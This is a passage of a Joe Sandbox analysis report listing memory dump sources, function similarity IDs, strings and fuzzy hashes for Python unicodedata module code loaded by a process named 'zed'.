                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                                • String ID: a unicode character$argument 1$name
                                                                                                                                                                                                                                                • API String ID: 3876575403-4190364640
                                                                                                                                                                                                                                                • Opcode ID: ab7f7404489c6aefaed3bb65c109ab607c61dcc8bacd4a48ace643e301676b9f
                                                                                                                                                                                                                                                • Instruction ID: 33883e26252f7177ea13ada024025df071e55270108824edb29a7d54d093254a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab7f7404489c6aefaed3bb65c109ab607c61dcc8bacd4a48ace643e301676b9f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D11C135F0AA42A5EAA89B46E4603FDA361FF85BC8F48A072DE0D43755CF2CE595D300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                                • String ID: a unicode character$argument 1$numeric
                                                                                                                                                                                                                                                • API String ID: 3876575403-2385192657
                                                                                                                                                                                                                                                • Opcode ID: f2c4218ba94db24fb659ccbfd3ee4767c89f092abad47c48dbe9f437d0b50517
                                                                                                                                                                                                                                                • Instruction ID: 5d68a48436fc915b9c84f1961f334f769b2ade4ec776d88a0c5ace9430208cd6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2c4218ba94db24fb659ccbfd3ee4767c89f092abad47c48dbe9f437d0b50517
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8311C131B0AA42A4EAA89B46E4603EDA360FB45FC8F546072DE0D47755CF2DE585D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                                                • String ID: a unicode character$argument$mirrored
                                                                                                                                                                                                                                                • API String ID: 3979797681-4001128513
                                                                                                                                                                                                                                                • Opcode ID: 9496c058ca4f3a92d16c11e0dea8752c802f91a4b5f675f0277ed2c6365c313a
                                                                                                                                                                                                                                                • Instruction ID: 8b4a2b82a0466a91f3a6242a92613f17d5fe28c5d2a2078aa53ea786e0886886
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9496c058ca4f3a92d16c11e0dea8752c802f91a4b5f675f0277ed2c6365c313a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01017160F0AA43A6EAFC9B5594703FD63A1BF4975CF402671D54D83290DE2CE594E301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                                                • String ID: a unicode character$argument$combining
                                                                                                                                                                                                                                                • API String ID: 3979797681-4202047184
                                                                                                                                                                                                                                                • Opcode ID: f57a56bca3f03315399802cbb188705c8f0221a3905f8c719d86b24713be5e96
                                                                                                                                                                                                                                                • Instruction ID: 21db6b546b8af7482026baf80e183ee4cdd7d5bf04b32886ae935d79b0c454e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f57a56bca3f03315399802cbb188705c8f0221a3905f8c719d86b24713be5e96
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C017160F1AA42B2EABC9755E4702FD62A1BF4875CF9036B5D50D83294DE2CE595E300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Mem_$Capsule_Err_FreeMallocMemory
                                                                                                                                                                                                                                                • String ID: unicodedata._ucnhash_CAPI
                                                                                                                                                                                                                                                • API String ID: 3673501854-3989975041
                                                                                                                                                                                                                                                • Opcode ID: 04962b3129ec8039d4574c2b15526bc82bf072c2335504b47079f601afa57e40
                                                                                                                                                                                                                                                • Instruction ID: 3249c829a69c2a88747706853443fb1c7b5f434c9912d2aa06d38fea6221d2e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04962b3129ec8039d4574c2b15526bc82bf072c2335504b47079f601afa57e40
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48F01D20B1BF46B5EBA99B65E4342FC63A4BF08788F4874B1D84E06394EE3CE054E350
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyErr_SetString.PYTHON312(?,?,?,?,?,00007FFD8A251EBC), ref: 00007FFD8A253C1F
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A251FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD8A251FE8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A251FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD8A252006
                                                                                                                                                                                                                                                • PyErr_Format.PYTHON312 ref: 00007FFD8A251F33
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_strncmp$FormatString
                                                                                                                                                                                                                                                • String ID: name too long$undefined character name '%s'
                                                                                                                                                                                                                                                • API String ID: 3882229318-4056717002
                                                                                                                                                                                                                                                • Opcode ID: 1035d3c545dcad7f3fc1fcdb04c9696ab0948ab795443172b9eb40205ee2c5c7
                                                                                                                                                                                                                                                • Instruction ID: 1e6d6ec7ad16344e1b21cdcb59c2e2eb862239eabbcf69dc22b3cd4af4b87d15
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1035d3c545dcad7f3fc1fcdb04c9696ab0948ab795443172b9eb40205ee2c5c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA111F75B1AA47E1EB94DB58D4A43FC6360FB4874CF8065B1CA0E876A0DF6DE14AD700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: strncmp
                                                                                                                                                                                                                                                • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                                • API String ID: 1114863663-87138338
                                                                                                                                                                                                                                                • Opcode ID: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                                • Instruction ID: f6b88d2842eed1680962b99d882418fe06371bb7490b8320aadaf81f2a0781ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35613B32B1A65156E7B88A15A4207FE7292FB94B98F44A271EE5D47BC4EF3CE401DB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4748791007.00007FFD8A371000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFD8A370000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748703875.00007FFD8A370000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4750619001.00007FFD8AA9D000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4750711626.00007FFD8AAA3000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4750797804.00007FFD8AAA5000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4750884258.00007FFD8AAAB000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4750994242.00007FFD8AAAC000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4751149045.00007FFD8AAB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a370000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: 94c9acafe10be122d2f397f1e5ea694c59c3688944f7c31b8d4002f49b5f86db
                                                                                                                                                                                                                                                • Instruction ID: 7473772497a5b2849000b1722168499b2224654c5b030f0095bc78d5a52743ca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94c9acafe10be122d2f397f1e5ea694c59c3688944f7c31b8d4002f49b5f86db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF113026B59F029AEB14DF60E8642B833A4F719758F440E31EA6D86BA4DF7CE155C380
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4754126153.00007FFD8B001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFD8B000000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4754007573.00007FFD8B000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4754569858.00007FFD8B282000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4754569858.00007FFD8B2A2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4754569858.00007FFD8B2B1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4754569858.00007FFD8B327000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4754970018.00007FFD8B4F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755044480.00007FFD8B55D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755097352.00007FFD8B563000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755146018.00007FFD8B564000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755193987.00007FFD8B565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755275262.00007FFD8B566000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755329427.00007FFD8B567000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755379300.00007FFD8B568000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755464739.00007FFD8B5EB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755585978.00007FFD8B5EC000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755668493.00007FFD8B5EF000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755749862.00007FFD8B5F1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755833494.00007FFD8B5FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4755922528.00007FFD8B620000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4756002893.00007FFD8B621000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4756053853.00007FFD8B622000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4756138535.00007FFD8B623000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4756223352.00007FFD8B625000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4756306063.00007FFD8B631000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4756388570.00007FFD8B632000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4756478943.00007FFD8B674000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4756531590.00007FFD8B691000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8b000000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c3ed045bb38a667c100e22636b803ba1f380a34d6de05b6f2a16d532bdd1e237
                                                                                                                                                                                                                                                • Instruction ID: 9aca32cd8b1b2092bf10e982eba3dbf90cd0ce5145a4b5654717fe3e3c3c5e89
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3ed045bb38a667c100e22636b803ba1f380a34d6de05b6f2a16d532bdd1e237
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14111822B15F058AEB00CF65E8652AC33A4FB19758F441E31EA6D87BA4DF7CD158C340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                                • Instruction ID: a760eceff85b13f76b743843f296da57aad3749a033f41fd87ea2cf352ffd3b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C115122B15F0199EB54DFA4E8643B933A4FB19758F442D31DA1D42BA4DF38D154C340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
